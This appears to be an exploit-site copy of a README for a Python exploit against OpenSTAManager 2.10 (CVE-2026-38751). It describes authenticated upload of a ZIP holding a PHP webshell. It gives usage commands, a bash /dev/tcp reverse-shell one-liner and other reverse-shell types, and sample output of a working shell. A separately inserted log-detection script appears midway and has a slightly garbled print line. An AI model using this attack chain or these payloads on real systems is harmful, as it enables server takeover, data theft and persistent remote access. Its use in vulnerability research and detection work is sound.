## https://sploitus.com/exploit?id=0AD81F0A-804F-5737-B912-95EFBDA45CE6
# OpenSTAManager RCE Exploit (CVE-2026-38751)
## Overview
This Python script exploits a Remote Code Execution vulnerability in OpenSTAManager version 2.10, identified as CVE-2026-38751. The exploit allows authenticated users to upload a malicious module and execute arbitrary commands on the target system.
## Vulnerability Details
- **CVE ID**: CVE-2026-38751
- **Product**: OpenSTAManager
- **Version**: 2.10
- **Type**: Remote Code Execution (RCE)
- **Attack Vector**: Web-based, requires valid authentication
## How the Exploit Works
The exploit follows these steps:
1. **Authentication**: Logs into the OpenSTAManager application using provided credentials
2. **Enable Updates**: Activates module update functionality which is required for the exploit
3. **Create Malicious ZIP**: Generates a ZIP file containing:
   - A module definition file (`MODULE`)
   - A PHP shell script (`shell.php`) that executes commands via GET parameter `c`
4. **Upload Module**: Uploads the malicious ZIP through the module update interface
5. **Verify Exploitation**: Confirms the shell is accessible and functional
6. **Execute Commands**: Either:
   - Interactive shell mode for manual command execution
   - Reverse shell connection to establish a persistent connection
## Prerequisites
- Python 3.x
- Required Python modules: `requests` (third-party package), `zipfile` (part of the Python standard library)
- Valid admin credentials for OpenSTAManager
- Network access to the target system
## Usage
### Basic Usage
```bash
python3 exploit.py -u http://target.com -U admin -P password
```
### Interactive Shell Mode
```bash
python3 exploit.py -u http://target.com -U admin -P password --interactive
```
### Reverse Shell Mode
```bash
python3 exploit.py -u http://target.com -U admin -P password --lhost 10.10.14.180 --lport 4444
```
## Arguments
| Argument | Description |
|----------|-------------|
| `-u`, `--url` | Target URL (required) |
| `-U`, `--user` | Username for authentication (required) |
| `-P`, `--password` | Password for authentication (required) |
| `--interactive` | Enter interactive shell mode |
| `--no-cleanup` | Don't remove shell files after execution |
| `--lhost` | Local host for reverse shell |
| `--lport` | Local port for reverse shell |
## Technical Details
### Exploitation Process
1. **Authentication**: The script performs a login request to the application's authentication endpoint
2. **Module Update Enablement**: Sends a POST request to enable module updates functionality
3. **ZIP Generation**: Creates a ZIP archive with:
   - `shell/MODULE`: Module configuration file
   - `shell/shell.php`: PHP webshell that executes commands passed via GET parameter `c`
4. **Upload Process**: Uses multipart form data to upload the malicious ZIP to the module update endpoint
5. **Verification**: Tests the uploaded shell by executing a simple command like `id` to confirm it's working
6. **Command Execution**: Either provides an interactive shell or establishes a reverse shell connection
### Payloads Used
The exploit attempts multiple reverse shell payloads:
- Bash reverse shell: `bash -i >& /dev/tcp/{lhost}/{lport} 0>&1`
- Python reverse shells using socket connections
- Base64 encoded bash payload
- Netcat reverse shell
## Security Considerations
⚠️ **Disclaimer**: This exploit is intended for educational and authorized security testing purposes only.
### Risk Assessment
This vulnerability allows:
- Arbitrary code execution as the web server user
- Potential privilege escalation
- Access to sensitive data stored on the system
- Possible lateral movement within a network
### Mitigation
To protect against this vulnerability:
1. Update OpenSTAManager to the latest version
2. Implement proper authentication controls
3. Restrict file upload capabilities
4. Monitor for suspicious activity
5. Apply network segmentation
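One way to act on item 4, as an added example that is not part of the original repository: a log check that flags GET requests to a PHP file sitting directly in a module directory and carrying the `c` parameter, which is the access pattern shown in the example output (`/modules/shell/shell.php?c=...`). The function name, the assumption of Apache/nginx combined log format, and the sample log lines are all constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Assumption: access logs are in common/combined log format.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# A PHP file requested directly inside a module folder: /modules/<name>/<file>.php
MODULE_PHP = re.compile(r'/modules/[^/]+/[^/]+\.php$', re.IGNORECASE)


def find_module_shell_hits(lines, param="c"):
    """Return (ip, timestamp, path, param value, status) for each suspicious GET."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m or m["method"] != "GET":
            continue
        url = urlsplit(m["target"])
        # Decode percent-encoding so "shell%2Ephp" is treated like "shell.php".
        path = unquote(url.path)
        if not MODULE_PHP.search(path):
            continue
        values = parse_qs(url.query, keep_blank_values=True).get(param)
        if values is None:
            continue  # module PHP file requested without the command parameter
        hits.append((m["ip"], m["ts"], path, values[0], int(m["status"])))
    return hits


# Constructed sample log lines (documentation IP ranges, not real traffic).
SAMPLE_LOG = [
    '203.0.113.7 - - [01/Jan/2026:10:00:01 +0000] "GET /modules/shell/shell.php?c=id HTTP/1.1" 200 54',
    '203.0.113.7 - - [01/Jan/2026:10:00:05 +0000] "GET /modules/shell/shell.php?c=whoami HTTP/1.1" 200 9',
    '198.51.100.4 - - [01/Jan/2026:10:01:00 +0000] "GET /index.php HTTP/1.1" 200 8123',
    '198.51.100.4 - - [01/Jan/2026:10:02:00 +0000] "GET /modules/shell/shell%2Ephp?c=uname%20-a HTTP/1.1" 200 80',
    '198.51.100.4 - - [01/Jan/2026:10:03:00 +0000] "GET /assets/app.css?c=1 HTTP/1.1" 200 300',
]

if __name__ == "__main__":
    for ip, ts, path, value, status in find_module_shell_hits(SAMPLE_LOG):
        print(f"[ALERT] {ts} {ip} -> {path} {param_name if False else 'c'}={value!r} (HTTP {status})")
```

A 200 response on a flagged request means the file exists and answered, so the module directory itself should be inspected for files that were not part of the installed release.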
## Example Output
```
[ OpenSTAManager RCE Exploit : ]
Target: http://target.com
[*] Step 1: Login...
[+] Login successful: admin
[*] Step 2: Enable updates...
[+] Updates enabled
[*] Step 3: Create ZIP...
[*] Created in-memory ZIP file
[*] Shell location: /modules/shell/shell.php
[*] Step 4: Upload...
[*] Upload status: 200
[+] Upload successful
[*] Step 5: Verify...
[+] Vulnerability confirmed!
[+] Shell: http://target.com/modules/shell/shell.php
[+] Test: http://target.com/modules/shell/shell.php?c=whoami
[*] Entering interactive mode...
cmd> whoami
www-data
cmd> exit
```
## References
- [GitHub Repository](https://github.com/b0ySie7e/OpenSTAManager-RCE-Exploit-CVE-2026-38751)
- [CVE Details](https://nvd.nist.gov/vuln/detail/CVE-2026-38751)
## License
This exploit is provided for educational purposes only. Unauthorized use against systems you do not own or have explicit permission to test is illegal.